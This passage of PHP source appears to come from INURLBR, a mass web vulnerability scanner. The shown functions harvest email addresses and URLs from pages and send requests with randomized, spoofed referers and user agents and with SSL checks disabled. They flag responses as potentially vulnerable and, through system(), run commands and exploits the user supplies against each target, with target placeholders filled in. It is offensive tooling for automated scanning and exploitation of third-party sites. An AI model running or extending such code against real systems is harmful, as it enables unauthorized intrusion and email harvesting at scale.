(filter_var($valor, FILTER_VALIDATE_EMAIL) ? $_SESSION["config"]["resultado_valores"].="{$valor}\n" : NULL);
__plus();
(filter_var($valor, FILTER_VALIDATE_EMAIL) ? __saveValue($_SESSION["config"]["arquivo_output"], $valor) : NULL);
$_SESSION['config']['cont_valores'] ++;
}
__plus();
}
__timeSec('delay', "\n");
}
################################################################################
#This function will filter urls each url########################################
################################################################################
function __extractURLs($html, $url_) {
$matches = NULL;
__plus();
$reg_tag = 'href=\"|src=\"|value=\"';
$reg = "#\b({$reg_tag}http[s]?://|{$reg_tag}ftp[s]?://){1,}?([-a-zA-Z0-9\.]+)([-a-zA-Z0-9\.]){1,}([-a-zA-Z0-9_\.\#\@\:%_/\?\=\~\-\//\!\'\(\)\s\^\:blank:\:punct:\:xdigit:\:space:\$]+)#si";
preg_match_all($reg, $html, $matches);
echo "{$_SESSION["c1"]}{$_SESSION['config']['line']}{$_SESSION["c0"]}\n";
echo "{$_SESSION["c1"]} |_[ INFO ][URL] {$_SESSION["c0"]}=>{$_SESSION["c9"]} {$url_} {$_SESSION["c0"]}\n";
echo "{$_SESSION["c1"]}{$_SESSION['config']['line']}{$_SESSION["c0"]}\n";
$matches_ = array_unique(array_filter($matches[0]));
$blacklist = $_SESSION["config"]['blacklist'];
$blacklist_ = (isset($_SESSION["config"]["webcache"])) ? str_replace('webcache.,', '', $blacklist) : $blacklist;
foreach ($matches_ as $valor) {
$valor = __filterURLTAG($valor);
if (__validateURL($valor) && !__validateOptions($blacklist_, $valor, 1)) {
echo "{$_SESSION["c1"]}__[ + ]{$_SESSION["c0"]}[\033[01;31m {$_SESSION["config"]['cont_url']}"
. " {$_SESSION["c9"]}]- {$valor}{$_SESSION["c0"]}\n";
$_SESSION["config"]["resultado_valores"].="{$valor}\n";
__plus();
__saveValue($_SESSION["config"]["arquivo_output"], $valor) . __plus();
$_SESSION["config"]["cont_url"] ++;
}
__plus();
}
__timeSec('delay', "\n");
}
################################################################################
#This function removes the last regular expression ta###########################
################################################################################
function __filterURLTAG($valor = NULL) {
return(!is_null($valor)) ? str_replace('"', '', str_replace('href="', '', str_replace('src="', '', str_replace('value="', '', $valor)))) : NULL;
}
################################################################################
#Esta função irá formatar salvar urls concatenadas##############################
################################################################################
function __checkURLs($resultado, $url_) {
__plus();
$code = !is_null($_SESSION["config"]["ifcode"]) ? $_SESSION["config"]["ifcode"] : 200;
$valor = ($resultado['server']['http_code'] == $code) ? "{$_SESSION["c4"]}" : NULL;
echo "\n{$_SESSION["c1"]} |_[ INFO ]{$_SESSION["c0"]}[{$_SESSION["c1"]} {$_SESSION['config']['cont_valores']} {$_SESSION["c0"]}]\n";
echo "{$_SESSION["c1"]} |_[ INFO ][URL] {$_SESSION["c0"]}::{$_SESSION["c9"]}{$valor} {$url_} {$_SESSION["c0"]}\n";
echo "{$_SESSION["c1"]} |_[ INFO ][STATUS]::{$valor} {$resultado['server']['http_code']} {$_SESSION["c0"]}\n";
__timeSec('delay');
echo "{$_SESSION["c1"]}{$_SESSION['config']['line']}{$_SESSION["c0"]}";
__plus();
$target_ = array('url_clean' => $url_, 'url_xpl' => $url_);
if ($resultado == $code) {
$_SESSION['config']['resultado_valores'].= "{$url_}\n";
__saveValue($_SESSION["config"]["arquivo_output"], $url_) . __plus();
__plus();
(not_isnull_empty($_SESSION['config']['sub-file']) &&
is_array($_SESSION['config']['sub-file']) ? __subExecExploits($target_['url_xpl'], $_SESSION['config']['sub-file']) : NULL);
__plus();
(not_isnull_empty($_SESSION['config']['command-vul']) ? __command($_SESSION['config']['command-vul'], $target_) : NULL);
__plus();
(not_isnull_empty($_SESSION['config']['exploit-vul-id']) ?
__configExploitsExec($_SESSION['config']['exploit-vul-id'], $target_) : NULL);
__plus();
}
(not_isnull_empty($_SESSION['config']['exploit-all-id']) ? __configExploitsExec($_SESSION['config']['exploit-all-id'], $target_) : NULL);
__plus();
(not_isnull_empty($_SESSION['config']['command-all']) ? __command($_SESSION['config']['command-all'], $target_) : NULL);
__plus();
$_SESSION['config']['cont_valores'] ++;
__plus();
}
################################################################################
#This function will send the contents of the output buffer (if any)#############
################################################################################
function __plus() {
ob_flush();
flush();
}
################################################################################
#FORMATTING POST################################################################
################################################################################
function __convertUrlQuery($query) {
$queryParts = explode('&', $query);
$params = array();
$match = array();
foreach ($queryParts as $param) {
$item = explode('=', $param);
preg_match_all("([a-zA-Z0-9]=(.*))", $param, $match);
$params[$item[0]] = ($match[1][0]);
}
return $params;
}
################################################################################
#OPEN FILE BASE FOR VALIDATION##################################################
################################################################################
function __openFile($arquivo, $op = NULL) {
if (isset($arquivo) && !empty($arquivo)) {
$resultadoURL = array_unique(array_filter(explode("\n", file_get_contents($arquivo))));
if (is_array($resultadoURL)) {
return ($op == 1 ? $resultadoURL : __process($resultadoURL));
}
}
}
################################################################################
#CATCH INFORMATION IP###########################################################
################################################################################
function __infoIP($ip, $op = 0) {
/*
[longitude] => 4.9
[latitude] => 52.3667
[asn] => AS196752
[offset] => 2
[ip] => 46.19.37.0
[area_code] => 0
[continent_code] => EU
[dma_code] => 0
[timezone] => Europe/Amsterdam
[country_code] => NL
[isp] => Tilaa B.V.
[country] => Netherlands
[country_code3] => NLD
*/
preg_match_all('#\b(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})#si', $ip, $ip);
if (filter_var($ip[0][0], FILTER_VALIDATE_IP)) {
if ($op == 0) {
$request__ = __request_info("http://www.telize.com/geoip/{$ip[0][0]}", $_SESSION["config"]["proxy"], NULL);
__plus();
return json_decode($request__['corpo'], TRUE);
} else {
$_SESSION['config']['verifica_info'] = NULL;
$request__ = __request_info("http://www.telize.com/geoip/{$ip[0][0]}", $_SESSION["config"]["proxy"], NULL);
$return = json_decode($request__['corpo'], TRUE);
__plus();
return "{$return['city']} /{$return['country']} - {$return['country_code']} /{$return['continent_code']} , ISP: {$return['isp']}";
}
}
}
################################################################################
#CAPTURE URL POSITION IN BROWSER ALEXA / RELEVANCE OF SUCH URL##################
################################################################################
function __positionAlexa($url) {
$xmlSimple = simplexml_load_file("http://data.alexa.com/data?cli=10&dat=snbamz&url={$url}");
$resultRank = $xmlSimple->SD[1];
__plus();
if ($resultRank) {
$retornoRank = $resultRank->REACH->attributes()->RANK;
} else {
$retornoRank = 0;
}
return $retornoRank . __plus();
}
################################################################################
#GENERATE URL REFERENCE random##################################################
################################################################################
function __setURLReferenceRandom() {
$dominio = array('Adzuna', 'Bixee', 'CareerBuilder', 'Craigslist', 'Dice', 'Eluta.ca', 'Hotjobs', 'JobStreet', 'Incruit', 'Indeed', 'Glassdoor', 'LinkUp', 'Monster', 'Naukri',
'Yahoo', 'Legal', 'GoogleScholar', 'Lexis', 'Manupatra', 'Quicklaw', 'WestLaw', 'Medical', 'Bing Health', 'Bioinformatic', 'CiteAb', 'EB-eye', 'Entrez', 'mtv', 'ubuntu',
'GenieKnows', 'GoPubMed', 'Healia', 'Healthline', 'Nextbio', 'PubGene', 'Quertle', 'Searchmedica', 'WebMD', 'News', 'BingNews', 'Daylife', 'GoogleNews', 'aol', 'microsoft',
'MagPortal', 'Newslookup', 'Nexis', 'Topix', 'Trapit', 'YahooNews', 'People', 'Comfibook', 'Ex.plode', 'InfoSpace', 'PeekYou', 'Spock', 'Spokeo', 'WorldwideHelpers', 'iPhone',
'Zabasearch', 'ZoomInfo', 'Fizber', 'HotPads', 'Realtor', 'Redfin', 'Rightmove', 'Trulia', 'Zillow', 'Zoopla', 'StuRents', 'globo', 'sbt', 'band', 'cnn', 'blog.inurl.com.br'
);
$gTLD = array('aero', 'arpa', 'biz', 'com', 'coop', 'edu', 'gov', 'info', 'int', 'mil', 'museum', 'name', 'net', 'org', 'pro', 'tel');
$arquivo = array('admin', 'index', 'wp-admin', 'info', 'shop', 'file', 'out', 'open', 'news', 'add', 'profile', 'search', 'open', 'photo', 'insert', 'view');
$ext = array('exe', 'php', 'asp', 'aspx', 'jsf', 'html', 'htm', 'lua', 'log', 'cgi', 'sh', 'css', 'py', 'sql', 'xml', 'rss');
$pasta = array('App_Files', 'Assets', 'CFFileServlet', 'CFIDE', 'Communication', 'Computers', 'CoreAdminHome', 'CoreHome', 'Crawler', 'Creator',
'DECOM', 'Dashboard', 'Drives', 'Dynamic', 'FCKeditor', 'Feedback', 'Files', 'Flash', 'Forms', 'Help', 'ICEcore', 'IO', 'Image', 'JPG', 'getold',
'JSP', 'KFSI', 'Laguna', 'Login', 'Motors', 'MultiSites', 'NR', 'OCodger', 'RSS', 'Safety', 'Smarty', 'Software', 'Static', 'Stress', 'getfull',
'Sugarcrm', 'Travel', 'UPLOAD', 'Urussanga', 'UserFiles', '__tpl', '_fckeditor', '_info', '_machine', '_plugins', '_sample', '_samples', 'postmost',
'_source', '_testcases', 'aaa', 'abelardoluz', 'aberlardoluz', 'aborto', 'about', 'aboutus', 'abuse', 'abusers', 'ac_drives', 'acabamentos', 'mail',
'academias', 'acao', 'acartpro', 'acatalog', 'acc', 'acc_auto_del', 'acc_beep_ken', 'acc_beep_time', 'acc_ch_mail', 'acc_fc_prsc', 'accounts', 'validar',
'acc_html_mark', 'acc_html_rand', 'acc_lan_page', 'acc_pic_html', 'acc_profol', 'acc_soft_link', 'acc_ssd_page', 'acc_syun_ei', 'german', 'intranet', 'old',
'acc_time_go', 'acc_wbcreator', 'accept', 'accepted', 'acceso', 'access', 'accessibility', 'accessories', 'acciones', 'acclg', 'account', 'paste', 'paste22',
'acessorios', 'acontece', 'acougueiro', 'acoustic', 'act', 'action', 'activate', 'active', 'activeden', 'activism', 'actualit', 'actuators', 'ad', 'informatica',
'ad_division', 'ad_rate', 'adapter', 'adapters', 'adaptive', 'adaptivei', 'adatmentes', 'adbanner', 'adblock', 'adboard', 'adclick', 'add-ons', 'add', 'delete',
'added', 'addon', 'address', 'adduser', 'adfree', 'adhoc', 'adinfo', 'adios_papa', 'adlink', 'adlinks', 'acc_folder_vw', 'acc_syun_su',
);
$locais = array('ac', 'ad', 'ae', 'af', 'ag', 'al', 'am', 'an', 'ao', 'aq', 'ar', 'as', 'at', 'au', 'aw', 'az', 'ba', 'bb', 'bd', 'be', 'bf', 'bg', 'bh', 'bi', 'bj', 'bm', 'bn',
'bw', 'by', 'bz', 'ca', 'cc', 'cd', 'cf', 'cg', 'ch', 'ci', 'ck', 'cl', 'cm', 'cn', 'co', 'cr', 'cu', 'cv', 'cx', 'cy', 'cz', 'de', 'dj', 'dk', 'dm', 'do', 'dz', 'bo', 'br',
'ec', 'ee', 'eg', 'er', 'es', 'et', 'eu', 'fi', 'fj', 'fk', 'fm', 'fo', 'fr', 'ga', 'gb', 'gd', 'ge', 'gf', 'gg', 'gh', 'gi', 'gl', 'gm', 'gn', 'gp', 'gq', 'gr', 'bs', 'bt',
'gs', 'gt', 'gu', 'gw', 'gy', 'hk', 'hm', 'hn', 'hr', 'ht', 'hu', 'id', 'ie', 'il', 'im', 'in', 'io', 'iq', 'ir', 'is', 'it', 'je', 'jm', 'jo', 'jp', 'ke', 'kg', 'bv',
'kh', 'ki', 'km', 'kn', 'kr', 'kw', 'ky', 'kz', 'la', 'lb', 'lc', 'li', 'lk', 'lr', 'ls', 'lt', 'lu', 'lv', 'ly', 'ma', 'mc', 'md', 'me', 'mg', 'mh', 'mk', 'ml',
'mm', 'mn', 'mo', 'mp', 'mq', 'mr', 'ms', 'mt', 'mu', 'mv', 'mw', 'mx', 'my', 'mz', 'nb', 'nc', 'ne', 'nf', 'ng', 'ni', 'nl', 'no', 'np', 'nr', 'nu', 'nz', 'om',
'pa', 'pe', 'pf', 'pg', 'ph', 'pk', 'pl', 'pm', 'pn', 'pr', 'ps', 'pt', 'pw', 'py', 'qa', 're', 'ro', 'ru', 'rw', 'sa', 'sb', 'sc', 'sd', 'se', 'sg', 'sh', 'si',
'sj', 'sk', 'sl', 'sm', 'sn', 'so', 'sr', 'ss', 'st', 'su', 'sv', 'sy', 'sz', 'tc', 'td', 'tf', 'tg', 'th', 'tj', 'tk', 'tl', 'tm', 'tn', 'to', 'tr', 'tt', 'tv',
'tw', 'tz', 'ua', 'ug', 'uk', 'um', 'us', 'uy', 'uz', 'va', 'vc', 've', 'vg', 'vi', 'vn', 'vu', 'wf', 'ws', 'ye', 'yt', 'yu', 'za', 'zm', 'zw', 'ai',
);
return "http://www." . strtolower($dominio[rand(0, count($dominio) - 1)]) . ".{$gTLD[rand(0, count($gTLD) - 1)]}.{$locais[rand(0, count($locais) - 1)]}/{$pasta[rand(0, count($pasta) - 1)]}/{$arquivo[rand(0, count($arquivo) - 1)]}.{$ext[rand(0, count($ext) - 1)]}";
}
################################################################################
#GENERATE AGENT BROWSER random##################################################
################################################################################
function __setUserAgentRandom() {
$agentBrowser = array('Firefox', 'Safari', 'Opera', 'Flock', 'Internet Explorer', 'Seamonkey', 'Tor Browser', 'GNU IceCat', 'CriOS', 'TenFourFox',
'SeaMonkey', 'B-l-i-t-z-B-O-T', 'Konqueror', 'Mobile', 'Konqueror', 'Netscape', 'Chrome', 'Dragon', 'SeaMonkey', 'Maxthon', 'IBrowse',
'K-Meleon', 'GoogleBot', 'Konqueror', 'Minimo', 'Googlebot', 'WeltweitimnetzBrowser', 'SuperBot', 'TerrawizBot', 'YodaoBot', 'Wyzo', 'Grail',
'PycURL', 'Galaxy', 'EnigmaFox', '008', 'ABACHOBot', 'Bimbot', 'Covario IDS', 'iCab', 'KKman', 'Oregano', 'WorldWideWeb', 'Wyzo', 'GNU IceCat',
'Vimprobable', 'uzbl', 'Slim Browser', 'Flock', 'OmniWeb', 'Rockmelt', 'Shiira', 'Swift', 'Pale Moon', 'Camino', 'Flock', 'Galeon', 'Sylera'
);
$agentSistema = array('Windows 3.1', 'Windows 95', 'Windows 98', 'Windows 2000', 'Windows NT', 'Linux 2.4.22-10mdk', 'FreeBSD',
'Windows XP', 'Windows Vista', 'Redhat Linux', 'Ubuntu', 'Fedora', 'AmigaOS', 'BackTrack Linux', 'iPad', 'BlackBerry', 'Unix',
'CentOS Linux', 'Debian Linux', 'Macintosh', 'Android', 'iPhone', 'Windows NT 6.1', 'BeOS', 'OS 10.5', 'Nokia', 'Arch Linux',
'Ark Linux', 'BitLinux', 'Conectiva (Mandriva)', 'CRUX Linux', 'Damn Small Linux', 'DeLi Linux', 'Ubuntu', 'BigLinux', 'Edubuntu',
'Fluxbuntu', 'Freespire', 'GNewSense', 'Gobuntu', 'gOS', 'Mint Linux', 'Kubuntu', 'Xubuntu', 'ZeVenOS', 'Zebuntu', 'DemoLinux',
'Dreamlinux', 'DualOS', 'eLearnix', 'Feather Linux', 'Famelix', 'FeniX', 'Gentoo', 'GoboLinux', 'GNUstep', 'Insigne Linux',
'Kalango', 'KateOS', 'Knoppix', 'Kurumin', 'Dizinha', 'TupiServer', 'Linspire', 'Litrix', 'Mandrake', 'Mandriva', 'MEPIS',
'Musix GNU Linux', 'Musix-BR', 'OneBase Go', 'openSuSE', 'pQui Linux', 'PCLinuxOS', 'Plaszma OS', 'Puppy Linux', 'QiLinux',
'Red Hat Linux', 'Red Hat Enterprise Linux', 'CentOS', 'Fedora', 'Resulinux', 'Rxart', 'Sabayon Linux', 'SAM Desktop', 'Satux',
'Slackware', 'GoblinX', 'Slax', 'Zenwalk', 'SuSE', 'Caixa Mágica', 'HP-UX', 'IRIX', 'OSF/1', 'OS-9', 'POSYS', 'QNX', 'Solaris',
'OpenSolaris', 'SunOS', 'SCO UNIX', 'Tropix', 'EROS', 'Tru64', 'Digital UNIX', 'Ultrix', 'UniCOS', 'UNIflex', 'Microsoft Xenix',
'z/OS', 'Xinu', 'Research Unix', 'InfernoOS'
);
$locais = array('cs-CZ', 'en-US', 'sk-SK', 'pt-BR', 'sq_AL', 'sq', 'ar_DZ', 'ar_BH', 'ar_EG', 'ar_IQ', 'ar_JO',
'ar_KW', 'ar_LB', 'ar_LY', 'ar_MA', 'ar_OM', 'ar_QA', 'ar_SA', 'ar_SD', 'ar_SY', 'ar_TN', 'ar_AE', 'ar_YE', 'ar',
'be_BY', 'be', 'bg_BG', 'bg', 'ca_ES', 'ca', 'zh_CN', 'zh_HK', 'zh_SG', 'zh_TW', 'zh', 'hr_HR', 'hr', 'cs_CZ', 'cs',
'da_DK', 'da', 'nl_BE', 'nl_NL', 'nl', 'en_AU', 'en_CA', 'en_IN', 'en_IE', 'en_MT', 'en_NZ', 'en_PH', 'en_SG', 'en_ZA',
'en_GB', 'en_US', 'en', 'et_EE', 'et', 'fi_FI', 'fi', 'fr_BE', 'fr_CA', 'fr_FR', 'fr_LU', 'fr_CH', 'fr', 'de_AT', 'de_DE',
'de_LU', 'de_CH', 'de', 'el_CY', 'el_GR', 'el', 'iw_IL', 'iw', 'hi_IN', 'hu_HU', 'hu', 'is_IS', 'is', 'in_ID', 'in', 'ga_IE',
'ga', 'it_IT', 'it_CH', 'it', 'ja_JP', 'ja_JP_JP', 'ja', 'ko_KR', 'ko', 'lv_LV', 'lv', 'lt_LT', 'lt', 'mk_MK', 'mk', 'ms_MY',
'ms', 'mt_MT', 'mt', 'no_NO', 'no_NO_NY', 'no', 'pl_PL', 'pl', 'pt_PT', 'pt', 'ro_RO', 'ro', 'ru_RU', 'ru', 'sr_BA', 'sr_ME',
'sr_CS', 'sr_RS', 'sr', 'sk_SK', 'sk', 'sl_SI', 'sl', 'es_AR', 'es_BO', 'es_CL', 'es_CO', 'es_CR', 'es_DO', 'es_EC', 'es_SV',
'es_GT', 'es_HN', 'es_MX', 'es_NI', 'es_PA', 'es_PY', 'es_PE', 'es_PR', 'es_ES', 'es_US', 'es_UY', 'es_VE', 'es', 'sv_SE',
'sv', 'th_TH', 'th_TH_TH', 'th', 'tr_TR', 'tr', 'uk_UA', 'uk', 'vi_VN', 'vi'
);
return $agentBrowser[rand(0, count($agentBrowser) - 1)] . '/' . rand(1, 20) . '.' . rand(0, 20) . ' (' . $agentSistema[rand(0, count($agentSistema) - 1)] . ' ' . rand(1, 7) . '.' . rand(0, 9) . '; ' . $locais[rand(0, count($locais) - 1)] . ';)';
}
################################################################################
#RESPONSIBLE FOR RUN COMMANDS IN TERMINAL the installation of facilities########
################################################################################
function __installDepencia() {
echo __bannerlogo() . __plus();
echo "\n{$_SESSION["c15"]}|_[ * ]__{$_SESSION["c0"]}\n";
echo " {$_SESSION["c15"]}|[EXTERNAL COMMAND INSTALLING PREMISES ]:: {$_SESSION["c11"]}\n";
$dados = system("sudo apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl", $dados) . __plus();
sleep(1) . __plus();
echo "{$_SESSION["c0"]}";
if (empty($dados)) {
return FALSE;
}
unset($dados);
exit();
}
################################################################################
#RESPONSIBLE FOR RUN COMMANDS IN TERMINAL#######################################
################################################################################
function __command($commando, $alvo) {
if (!is_null($commando)) {
(strstr($commando, '_TARGET_') ||
strstr($commando, '_TARGETFULL_') ||
strstr($commando, '_TARGETIP_') ||
strstr($commando, '_EXPLOIT_') ||
strstr($commando, '_URI_') ||
strstr($commando, '_URI_') ||
strstr($commando, '_PORT_') ||
strstr($commando, '_RANDOM_') ? NULL :
__getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c2"]}SET PARAMETER - command correctly{$_SESSION["c0"]}\n"));
$uri = parse_url($alvo['url_xpl']);
$command[0] = str_replace("_TARGET_", "{$_SESSION["c8"]}" . __filterHostname($alvo['url_xpl']) . "{$_SESSION["c1"]}", $commando);
$command[0] = str_replace('_TARGETIP_', "{$_SESSION["c9"]}{$_SESSION['config']['server_ip']}{$_SESSION["c1"]}", $command[0]);
$command[0] = str_replace('_TARGETFULL_', "{$_SESSION["c14"]}{$alvo['url_clean']}{$_SESSION["c1"]}", $command[0]);
$command[0] = str_replace('_TARGETXPL_', "{$_SESSION["c14"]}{$alvo['url_xpl']}{$_SESSION["c1"]}", $command[0]);
$command[0] = str_replace("_EXPLOIT_", "{$_SESSION["c6"]}{$_SESSION['config']['exploit-command']}{$_SESSION["c1"]}", $command[0]);
$command[0] = str_replace('_URI_', "{$_SESSION["c8"]}{$uri['path']}{$_SESSION["c1"]}", $command[0]);
$command[0] = str_replace('_PORT_', "{$_SESSION["c9"]}{$alvo['url_port']}{$_SESSION["c1"]}", $command[0]);
$command[0] = str_replace('_RANDOM_', "{$_SESSION["c15"]}" . random(5) . "{$_SESSION["c1"]}", $command[0]);
$command[0] = __crypt($command[0]);
$command[1] = str_replace("_TARGET_", __filterHostname($alvo['url_clean']), $commando);
$command[1] = str_replace('_TARGETIP_', $_SESSION['config']['server_ip'], $command[1]);
$command[1] = str_replace('_TARGETFULL_', $alvo['url_clean'], $command[1]);
$command[1] = str_replace('_TARGETXPL_', $alvo['url_xpl'], $command[1]);
$command[1] = str_replace("_EXPLOIT_", $_SESSION['config']['exploit-command'], $command[1]);
$command[1] = str_replace("_URI_", $uri['path'], $command[1]);
$command[1] = str_replace("_PORT_", $alvo['url_port'], $command[1]);
$command[1] = str_replace("_RANDOM_", random(5), $command[1]);
$command[1] = str_replace("\n", '', str_replace("\r", '', $command[1]));
$command[1] = __crypt($command[1]);
echo "\n{$_SESSION["c1"]}|_[ * ]__\n";
echo " |[ EXTERNAL COMMAND ]:: {$command[0]}{$_SESSION["c11"]}\n";
$_ = array(0 => ($_SESSION['config']['popup']) ? 'sudo xterm -geometry 134x50+1900+0 -title "Auxiliary Window - INURLBR / COMMAND" -e ' : NULL, 1 => ($_SESSION['config']['popup']) ? ' > /dev/null &' : NULL);
echo ($_SESSION['config']['popup'] ? "\t[!] opening auxiliary window...\n" : NULL);
$dados = system($_[0] . $command[1] . $_[1], $dados);
sleep(1) . __plus();
echo $_SESSION["c0"];
}
if (empty($dados[0])) {
return FALSE;
}
unset($dados);
}
################################################################################
#FILTER BY TAKING ONLY RESPONSIBLE URL HOSTNAME#################################
################################################################################
function __filterHostname($url) {
$alvo_ = NULL;
//#\b((((ht|f)tps?://*)|(www|ftp)\.)[a-zA-Z0-9-\.]+)#i - 1.0
preg_match_all('@^(?:(ht|f)tps?://*)?([^/]+)@i', $url, $alvo_);
return str_replace("/", '', str_replace("ftps:", '', str_replace("ftp:", '', str_replace("https:", '', str_replace("http:", '', $alvo_[0][0])))));
}
################################################################################
#RESPONSIBLE FOR ALL REQUESTS GET / POST THE SCRIPT#############################
################################################################################
/*
curl_multi_init — Returns a new cURL multi handle
(PHP 5) http://php.net/manual/en/function.curl-multi-init.php
*/
function __request_info($url_, $proxy = NULL, $postDados = NULL) {
$url_ = __crypt($url_);
$mh = curl_multi_init();
$curl_array = array();
$nodes = is_array($url_) ? $url_ : array($url_);
foreach ($nodes as $i => $url) {
$curl_array[$i] = curl_init($url);
__plus();
//FORMATANDO POST & EXECUTANDO urlencode EM CADA VALOR DO POST.
if (not_isnull_empty($postDados) && is_array($postDados)) {
foreach ($postDados as $campo => $valor) {
$postDados_format .= "{$campo}=" . urlencode($valor) . '&';
}
$postDados_format = rtrim($postDados_format, '&');
curl_setopt($curl_array[$i], CURLOPT_POST, count($postDados));
curl_setopt($curl_array[$i], CURLOPT_POSTFIELDS, __crypt($postDados_format));
}
curl_setopt($curl_array[$i], CURLOPT_HTTPHEADER, array_merge(not_isnull_empty($_SESSION['config']['http-header']) ?
explode(',', __crypt($_SESSION['config']['http-header'])) : array(), array("Cookie: disclaimer_accepted=true")));
curl_setopt($curl_array[$i], CURLOPT_USERAGENT, (not_isnull_empty($_SESSION['config']['user-agent'])) ?
__crypt($_SESSION['config']['user-agent']) : __setUserAgentRandom());
curl_setopt($curl_array[$i], CURLOPT_REFERER, (not_isnull_empty($_SESSION['config']['url-reference'])) ?
__crypt($_SESSION['config']['url-reference']) : __setURLReferenceRandom());
(!is_null($proxy) ? curl_setopt($curl_array[$i], CURLOPT_PROXY, $proxy) : NULL);
(!is_null($_SESSION['config']['verifica_info'])) ? curl_setopt($curl_array[$i], CURLOPT_HEADER, 1) : NULL;
(!is_null($_SESSION['config']['verifica_info']) && __validateOptions('3,6', $_SESSION['config']['debug']) ?
curl_setopt($curl_array[$i], CURLOPT_VERBOSE, 1) : NULL);
__plus();
curl_setopt($curl_array[$i], CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($curl_array[$i], CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($curl_array[$i], CURLOPT_FRESH_CONNECT, 1);
curl_setopt($curl_array[$i], CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl_array[$i], CURLOPT_CONNECTTIMEOUT, not_isnull_empty($_SESSION['config']['time-out']) ?
$_SESSION['config']['time-out'] : 5);
curl_setopt($curl_array[$i], CURLOPT_TIMEOUT, not_isnull_empty($_SESSION['config']['time-out']) ?
$_SESSION['config']['time-out'] : 5);
curl_setopt($curl_array[$i], CURLOPT_COOKIEFILE, not_isnull_empty($_SESSION['config']['file-cookie']) ?
$_SESSION['config']['file-cookie'] : 'cookie.txt');
curl_setopt($curl_array[$i], CURLOPT_COOKIEJAR, not_isnull_empty($_SESSION['config']['file-cookie']) ?
$_SESSION['config']['file-cookie'] : 'cookie.txt');
curl_multi_add_handle($mh, $curl_array[$i]);
}
$running = NULL;
do {
usleep(100);
curl_multi_exec($mh, $running);
} while ($running > 0);
$ret = array();
foreach ($nodes as $i => $url) {
$ret[0] = curl_multi_getcontent($curl_array[$i]);
$ret[1] = curl_getinfo($curl_array[$i]);
$ret[2] = curl_error($curl_array[$i]);
}
foreach ($nodes as $i => $url) {
curl_multi_remove_handle($mh, $curl_array[$i]);
}
$status = NULL;
preg_match_all('(HTTP.*)', $ret[0], $status['http']);
preg_match_all('(Server:.*)', $ret[0], $status['server']);
preg_match_all('(X-Powered-By:.*)', $ret[0], $status['X-Powered-By']);
__plus();
$ret[3] = str_replace("\r", '', str_replace("\n", '', "{$status['http'][0][0]}, {$status['server'][0][0]} {$status['X-Powered-By'][0][0]}"));
__debug(array('debug' => "[ BODY ]{$ret[0]}", 'function' => '__request_info'), 4);
__plus();
__debug(array('debug' => "[ URL ]{$url_}", 'function' => '__request_info'), 2);
__plus();
curl_multi_close($mh) . unlink('cookie.txt');
__plus();
unset($curl_array);
return isset($ret[0]) ? array('corpo' => $ret[0], 'server' => $ret[1], 'error' => $ret[2], 'info' => $ret[3]) : FALSE;
}
################################################################################
#CAPTURE INFORMATION SERVER AND VALIDATE FAULTS#################################
################################################################################
function __infoServer($url_, $postDados = NULL) {
__plus();
$_SESSION['config']['verifica_info'] = 1;
$resultado = __request_info($url_, $_SESSION["config"]["proxy"], $postDados);
__plus();
if (isset($resultado['corpo'])) {
if (!is_null($_SESSION['config']['extrai-email'])) {
__plus();
return __extractEmail($resultado['corpo'], $url_);
}
if (!is_null($_SESSION['config']['extrai-url'])) {
__plus();
return __extractURLs($resultado['corpo'], $url_);
}
if (not_isnull_empty($_SESSION['config']['regexp-filter'])) {
__plus();
return __extractRegCustom($resultado['corpo'], $url_);
}
if (not_isnull_empty($_SESSION['config']['target']) && $_SESSION['config']['tipoerro'] == 5) {
__plus();
return __checkURLs($resultado, $url_);
}
$ifcode = not_isnull_empty($_SESSION['config']['ifcode']) &&
strstr($resultado['server']['http_code'], $_SESSION['config']['ifcode']) ?
"CODE_HTTP_FOUND: {$_SESSION['config']['ifcode']} / " : NULL;
$ifredirect = not_isnull_empty($_SESSION['config']['ifredirect']) &&
(strstr($resultado['server']['redirect_url'], $_SESSION['config']['ifredirect'])) ?
'VALUE URL REDIRECT FOUND' : NULL;
$_SESSION['config']['erroReturn'] = $ifredirect . $ifcode . __checkError($resultado['corpo']);
__plus();
$_SESSION['config']['curl_getinfo'] = $resultado['server'];
$_SESSION['config']['error_conection'] = (not_isnull_empty($resultado['error']) ? $resultado['error'] : NULL);
$_SESSION['config']['server_ip'] = (!is_null($resultado['server']['primary_ip']) ? $resultado['server']['primary_ip'] : NULL);
$_SESSION['config']['vull_style'] = (not_isnull_empty($_SESSION['config']['erroReturn'])) ?
"{$_SESSION["c4"]}( POTENTIALLY VULNERABLE ){$_SESSION["c0"]} \033[1m \033[32m" . __cli_beep() : NULL;
$_SESSION['config']['resultado_valores'].=(not_isnull_empty($_SESSION['config']['erroReturn'])) ? "{$url_}\n" : NULL;
__plus();
$url_ = ($_SESSION['config']['alexa-rank']) ? ", RANK ALEXA: " . __positionAlexa($url_) : NULL;
__plus();
$_SESSION['config']['info_ip'] = __infoIP($resultado['server']['primary_ip'], 1);
__plus();
} else {
return FALSE;
}
__plus();
return "{$resultado['info']}, IP:{$resultado['server']['primary_ip']}:{$resultado['server']['primary_port']} {$url_}";
}
################################################################################
#ERROR MAIN PROCESS RESPONSIBLE FOR ALL VALIDATION OF MOTOR#####################
################################################################################
function __processUrlExec($url, $contUrl) {
__plus();
if (is_null($url) || empty($url)) {
return FALSE;
}
$host = (!is_null($_SESSION['config']['replace'])) ?
__replace($_SESSION['config']['replace'], urldecode($_SESSION['config']['tipoerro'] == 3 ? __filterHostname($url) : ($url))) :
urldecode($_SESSION['config']['tipoerro'] == 3 ? __filterHostname($url) : ($url));
$target_['url_xpl'] = __remove($_SESSION['config']['remove'], __mountURLExploit(!is_null($_SESSION['config']['url']) ? $_SESSION['config']['url'] . $host : $host));
$info = __infoServer($target_['url_xpl'], $_SESSION['config']['exploit-post']);
$target_['url_clean'] = ($_SESSION['config']['tipoerro'] == 4) ? $_SESSION['config']['url'] . $host : urldecode($url);
__plus();
if ($_SESSION['config']['tipoerro'] != 5 && is_null($_SESSION['config']['extrai-email']) &&
is_null($_SESSION['config']['extrai-url']) && is_null($_SESSION['config']['regexp-filter'])) {
$ifredirect = strstr($_SESSION['config']['curl_getinfo']['redirect_url'], $_SESSION['config']['ifredirect']) ?
